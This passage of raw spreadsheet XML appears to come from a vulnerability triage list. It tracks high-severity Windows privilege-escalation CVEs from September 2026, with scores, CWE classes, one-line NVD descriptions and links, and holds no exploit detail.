t="inlineStr"><is><t>HIGH</t></is></c><c r="F973" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G973" s="5" t="inlineStr" /><c r="H973" s="5" t="n"><v>0.003</v></c><c r="I973" s="5" t="inlineStr" /><c r="J973" s="5" t="inlineStr" /><c r="K973" s="5" t="inlineStr" /><c r="L973" s="5" t="inlineStr" /><c r="M973" s="5" t="inlineStr" /><c r="N973" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O973" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P973" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q973" s="5" t="inlineStr" /><c r="R973" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S973" s="5" t="inlineStr"><is><t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T973" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t></is></c></row><row r="974"><c r="A974" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B974" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C974" s="5" t="inlineStr"><is><t>CVE-2026-69711</t></is></c><c r="D974" s="5" t="n"><v>7</v></c><c r="E974" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F974" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G974" s="5" t="inlineStr" /><c r="H974" s="5" t="n"><v>0.003</v></c><c r="I974" s="5" t="inlineStr" /><c r="J974" s="5" t="inlineStr" /><c r="K974" s="5" t="inlineStr" /><c r="L974" s="5" t="inlineStr" /><c r="M974" s="5" t="inlineStr" /><c r="N974" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O974" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P974" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q974" s="5" t="inlineStr" /><c r="R974" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S974" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T974" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t></is></c></row><row r="975"><c r="A975" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B975" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C975" s="5" t="inlineStr"><is><t>CVE-2026-69735</t></is></c><c r="D975" s="5" t="n"><v>7</v></c><c r="E975" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F975" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G975" s="5" t="inlineStr" /><c r="H975" s="5" t="n"><v>0.003</v></c><c r="I975" s="5" t="inlineStr" /><c r="J975" s="5" t="inlineStr" /><c r="K975" s="5" t="inlineStr" /><c r="L975" s="5" t="inlineStr" /><c r="M975" s="5" t="inlineStr" /><c r="N975" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O975" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P975" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q975" s="5" t="inlineStr" /><c r="R975" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S975" s="5" t="inlineStr"><is><t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T975" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t></is></c></row><row r="976"><c r="A976" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B976" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C976" s="5" t="inlineStr"><is><t>CVE-2026-69779</t></is></c><c r="D976" s="5" t="n"><v>7</v></c><c r="E976" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F976" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G976" s="5" t="inlineStr" /><c r="H976" s="5" t="n"><v>0.002</v></c><c r="I976" s="5" t="inlineStr" /><c r="J976" s="5" t="inlineStr" /><c r="K976" s="5" t="inlineStr" /><c r="L976" s="5" t="inlineStr" /><c r="M976" s="5" t="inlineStr" /><c r="N976" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O976" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P976" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q976" s="5" t="inlineStr" /><c r="R976" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S976" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T976" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t></is></c></row><row r="977"><c r="A977" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B977" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C977" s="5" t="inlineStr"><is><t>CVE-2026-69791</t></is></c><c r="D977" s="5" t="n"><v>7</v></c><c r="E977" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F977" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G977" s="5" t="inlineStr" /><c r="H977" s="5" t="n"><v>0.003</v></c><c r="I977" s="5" t="inlineStr" /><c r="J977" s="5" t="inlineStr" /><c r="K977" s="5" t="inlineStr" /><c r="L977" s="5" t="inlineStr" /><c r="M977" s="5" t="inlineStr" /><c r="N977" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O977" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P977" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q977" s="5" t="inlineStr" /><c r="R977" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S977" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T977" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t></is></c></row><row r="978"><c r="A978" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B978" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C978" s="5" t="inlineStr"><is><t>CVE-2026-69806</t></is></c><c r="D978" s="5" t="n"><v>7</v></c><c r="E978" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F978" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G978" s="5" t="inlineStr" /><c r="H978" s="5" t="n"><v>0.018</v></c><c r="I978" s="5" t="inlineStr" /><c r="J978" s="5" t="inlineStr" /><c r="K978" s="5" t="inlineStr" /><c r="L978" s="5" t="inlineStr" /><c r="M978" s="5" t="inlineStr" /><c r="N978" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O978" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P978" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q978" s="5" t="inlineStr" /><c r="R978" s="5" t="inlineStr"><is><t>CWE-200, CWE-94</t></is></c><c r="S978" s="5" t="inlineStr"><is><t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T978" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t></is></c></row><row r="979"><c r="A979" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B979" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C979" s="5" t="inlineStr"><is><t>CVE-2026-69814</t></is></c><c r="D979" s="5" t="n"><v>7</v></c><c r="E979" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F979" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G979" s="5" t="inlineStr" /><c r="H979" s="5" t="n"><v>0.003</v></c><c r="I979" s="5" t="inlineStr" /><c r="J979" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K979" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L979" s="5" t="inlineStr" /><c r="M979" s="5" t="inlineStr" /><c r="N979" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O979" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P979" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q979" s="5" t="inlineStr" /><c r="R979" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S979" s="5" t="inlineStr"><is><t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T979" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t></is></c></row><row r="980"><c r="A980" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B980" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C980" s="5" t="inlineStr"><is><t>CVE-2026-69816</t></is></c><c r="D980" s="5" t="n"><v>7</v></c><c r="E980" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F980" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G980" s="5" t="inlineStr" /><c r="H980" s="5" t="n"><v>0.003</v></c><c r="I980" s="5" t="inlineStr" /><c r="J980" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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980" s="5" t="inlineStr" /><c r="M980" s="5" t="inlineStr" /><c r="N980" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O980" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P980" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q980" s="5" t="inlineStr" /><c r="R980" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S980" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T980" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t></is></c></row><row r="981"><c r="A981" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B981" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C981" s="5" t="inlineStr"><is><t>CVE-2026-69817</t></is></c><c r="D981" s="5" t="n"><v>7</v></c><c r="E981" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F981" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G981" s="5" t="inlineStr" /><c r="H981" s="5" t="n"><v>0.003</v></c><c r="I981" s="5" t="inlineStr" /><c r="J981" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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1" s="5" t="inlineStr" /><c r="M981" s="5" t="inlineStr" /><c r="N981" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O981" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P981" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q981" s="5" t="inlineStr" /><c r="R981" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S981" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T981" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t></is></c></row><row r="982"><c r="A982" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B982" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C982" s="5" t="inlineStr"><is><t>CVE-2026-69818</t></is></c><c r="D982" s="5" t="n"><v>7</v></c><c r="E982" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F982" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G982" s="5" t="inlineStr" /><c r="H982" s="5" t="n"><v>0.003</v></c><c r="I982" s="5" t="inlineStr" /><c r="J982" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K982" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L982" s="5" t="inlineStr" /><c r="M982" s="5" t="inlineStr" /><c r="N982" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O982" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P982" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q982" s="5" t="inlineStr" /><c r="R982" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S982" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T982" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t></is></c></row><row r="983"><c r="A983" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B983" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C983" s="5" t="inlineStr"><is><t>CVE-2026-69834</t></is></c><c r="D983" s="5" t="n"><v>7</v></c><c r="E983" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F983" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G983" s="5" t="inlineStr" /><c r="H983" s="5" t="n"><v>0.003</v></c><c r="I983" s="5" t="inlineStr" /><c r="J983" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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3" s="5" t="inlineStr" /><c r="M983" s="5" t="inlineStr" /><c r="N983" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O983" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P983" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q983" s="5" t="inlineStr" /><c r="R983" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S983" s="5" t="inlineStr"><is><t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T983" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t></is></c></row><row r="984"><c r="A984" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B984" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C984" s="5" t="inlineStr"><is><t>CVE-2026-69838</t></is></c><c r="D984" s="5" t="n"><v>7</v></c><c r="E984" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F984" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G984" s="5" t="inlineStr" /><c r="H984" s="5" t="n"><v>0.003</v></c><c r="I984" s="5" t="inlineStr" /><c r="J984" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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4" s="5" t="inlineStr" /><c r="M984" s="5" t="inlineStr" /><c r="N984" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O984" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P984" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q984" s="5" t="inlineStr" /><c r="R984" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S984" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T984" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t></is></c></row><row r="985"><c r="A985" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B985" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C985" s="5" t="inlineStr"><is><t>CVE-2026-69859</t></is></c><c r="D985" s="5" t="n"><v>7</v></c><c r="E985" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F985" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G985" s="5" t="inlineStr" /><c r="H985" s="5" t="n"><v>0.002</v></c><c r="I985" s="5" t="inlineStr" /><c r="J985" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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85" s="5" t="inlineStr" /><c r="M985" s="5" t="inlineStr" /><c r="N985" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O985" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P985" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q985" s="5" t="inlineStr" /><c r="R985" s="5" t="inlineStr"><is><t>CWE-191, CWE-367</t></is></c><c r="S985" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T985" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t></is></c></row><row r="986"><c r="A986" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B986" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C986" s="5" t="inlineStr"><is><t>CVE-2026-69866</t></is></c><c r="D986" s="5" t="n"><v>7</v></c><c r="E986" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F986" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G986" s="5" t="inlineStr" /><c r="H986" s="5" t="n"><v>0.003</v></c><c r="I986" s="5" t="inlineStr" /><c r="J986" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K986"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986" s="5" t="inlineStr" /><c r="M986" s="5" t="inlineStr" /><c r="N986" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O986" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P986" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q986" s="5" t="inlineStr" /><c r="R986" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S986" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T986" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t></is></c></row><row r="987"><c r="A987" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B987" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C987" s="5" t="inlineStr"><is><t>CVE-2026-69889</t></is></c><c r="D987" s="5" t="n"><v>7</v></c><c r="E987" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F987" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G987" s="5" t="inlineStr" /><c r="H987" s="5" t="n"><v>0.003</v></c><c r="I987" s="5" t="inlineStr" /><c r="J987" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K987"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987" s="5" t="inlineStr" /><c r="M987" s="5" t="inlineStr" /><c r="N987" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O987" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P987" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q987" s="5" t="inlineStr" /><c r="R987" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S987" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T987" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t></is></c></row><row r="988"><c r="A988" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B988" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C988" s="5" t="inlineStr"><is><t>CVE-2026-69891</t></is></c><c r="D988" s="5" t="n"><v>7</v></c><c r="E988" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F988" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G988" s="5" t="inlineStr" /><c r="H988" s="5" t="n"><v>0.003</v></c><c r="I988" s="5" t="inlineStr" /><c r="J988" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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988" s="5" t="inlineStr" /><c r="M988" s="5" t="inlineStr" /><c r="N988" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O988" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P988" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q988" s="5" t="inlineStr" /><c r="R988" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S988" s="5" t="inlineStr"><is><t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T988" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t></is></c></row><row r="989"><c r="A989" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B989" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C989" s="5" t="inlineStr"><is><t>CVE-2026-69896</t></is></c><c r="D989" s="5" t="n"><v>7</v></c><c r="E989" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F989" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G989" s="5" t="inlineStr" /><c r="H989" s="5" t="n"><v>0.003</v></c><c r="I989" s="5" t="inlineStr" /><c r="J989" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K989" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L989" s="5" t="inlineStr" /><c r="M989" s="5" t="inlineStr" /><c r="N989" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O989" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P989" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q989" s="5" t="inlineStr" /><c r="R989" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S989" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T989" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t></is></c></row><row r="990"><c r="A990" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B990" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C990" s="5" t="inlineStr"><is><t>CVE-2026-69911</t></is></c><c r="D990" s="5" t="n"><v>7</v></c><c r="E990" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F990" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G990" s="5" t="inlineStr" /><c r="H990" s="5" t="n"><v>0.003</v></c><c r="I990" s="5" t="inlineStr" /><c r="J990" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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0" s="5" t="inlineStr" /><c r="M990" s="5" t="inlineStr" /><c r="N990" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O990" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P990" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q990" s="5" t="inlineStr" /><c r="R990" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S990" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T990" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t></is></c></row><row r="991"><c r="A991" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B991" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C991" s="5" t="inlineStr"><is><t>CVE-2026-70283</t></is></c><c r="D991" s="5" t="n"><v>7</v></c><c r="E991" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F991" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G991" s="5" t="inlineStr" /><c r="H991" s="5" t="n"><v>0.002</v></c><c r="I991" s="5" t="inlineStr" /><c r="J991" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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1" s="5" t="inlineStr" /><c r="M991" s="5" t="inlineStr" /><c r="N991" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O991" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P991" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q991" s="5" t="inlineStr" /><c r="R991" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S991" s="5" t="inlineStr"><is><t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T991" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t></is></c></row><row r="992"><c r="A992" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B992" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C992" s="5" t="inlineStr"><is><t>CVE-2026-70562</t></is></c><c r="D992" s="5" t="n"><v>7</v></c><c r="E992" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F992" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G992" s="5" t="inlineStr" /><c r="H992" s="5" t="n"><v>0.003</v></c><c r="I992" s="5" t="inlineStr" /><c r="J992" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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2" s="5" t="inlineStr" /><c r="M992" s="5" t="inlineStr" /><c r="N992" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O992" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P992" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q992" s="5" t="inlineStr" /><c r="R992" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S992" s="5" t="inlineStr"><is><t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T992" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t></is></c></row><row r="993"><c r="A993" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B993" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C993" s="5" t="inlineStr"><is><t>CVE-2026-70565</t></is></c><c r="D993" s="5" t="n"><v>7</v></c><c r="E993" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F993" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G993" s="5" t="inlineStr" /><c r="H993" s="5" t="n"><v>0.003</v></c><c r="I993" s="5" t="inlineStr" /><c r="J993" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K99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3" s="5" t="inlineStr" /><c r="M993" s="5" t="inlineStr" /><c r="N993" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O993" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P993" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q993" s="5" t="inlineStr" /><c r="R993" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S993" s="5" t="inlineStr"><is><t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T993" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t></is></c></row><row r="994"><c r="A994" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B994" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C994" s="5" t="inlineStr"><is><t>CVE-2026-70567</t></is></c><c r="D994" s="5" t="n"><v>7</v></c><c r="E994" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F994" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G994" s="5" t="inlineStr" /><c r="H994" s="5" t="n"><v>0.003</v></c><c r="I994" s="5" t="inlineStr" /><c r="J994" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K994" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L994" s="5" t="inlineStr" /><c r="M994" s="5" t="inlineStr" /><c r="N994" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O994" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P994" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q994" s="5" t="inlineStr" /><c r="R994" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S994" s="5" t="inlineStr"><is><t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T994" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t></is></c></row><row r="995"><c r="A995" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B995" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C995" s="5" t="inlineStr"><is><t>CVE-2026-70568</t></is></c><c r="D995" s="5" t="n"><v>7</v></c><c r="E995" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F995" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G995" s="5" t="inlineStr" /><c r="H995" s="5" t="n"><v>0.003</v></c><c r="I995" s="5" t="inlineStr" /><c r="J995" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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995" s="5" t="inlineStr" /><c r="M995" s="5" t="inlineStr" /><c r="N995" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O995" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P995" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q995" s="5" t="inlineStr" /><c r="R995" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S995" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T995" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t></is></c></row><row r="996"><c r="A996" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B996" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C996" s="5" 